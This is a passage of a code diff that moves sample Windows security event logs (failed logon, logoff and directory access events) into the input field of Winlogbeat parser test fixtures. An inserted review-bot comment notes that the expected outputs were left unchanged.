Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}" + } }, "expected": { "message": 
"{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11
-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json index ddc69e63b..035469c13 100644 --- a/Beats/winlogbeat/tests/security_event_4634.json +++ b/Beats/winlogbeat/tests/security_event_4634.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": 
"{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount 
Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit 
Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json index 3d80320f5..3f1de8e53 100644 --- a/Beats/winlogbeat/tests/security_event_4662.json +++ b/Beats/winlogbeat/tests/security_event_4662.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s 
:\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", 
"dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s 
:\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}" + } }, "expected": { "message": 
"{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler 
l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", 
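Review bot: The `expected` block of this fixture is left untouched by the hunk even though the event is only now supplied as `input.message`; `message` previously sat beside `input`, so if the harness reads `input.message` (inferred from the new layout) the parser was presumably fed nothing by the old fixture and the expected values should be regenerated against the parser with this input before merging. The same applies to the security_event_4672.json, security_event_4689.json and security_event_4720.json hunks that follow. If the old layout was accepted silently, a fixture-schema check such as `assert "message" in case["input"], "fixture has no input.message"` (constructed example) in the test loader would keep no-op test cases from reappearing.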
diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json
index 59c3d35b3..ec935a02c 100644
--- a/Beats/winlogbeat/tests/security_event_4672.json
+++ b/Beats/winlogbeat/tests/security_event_4672.json
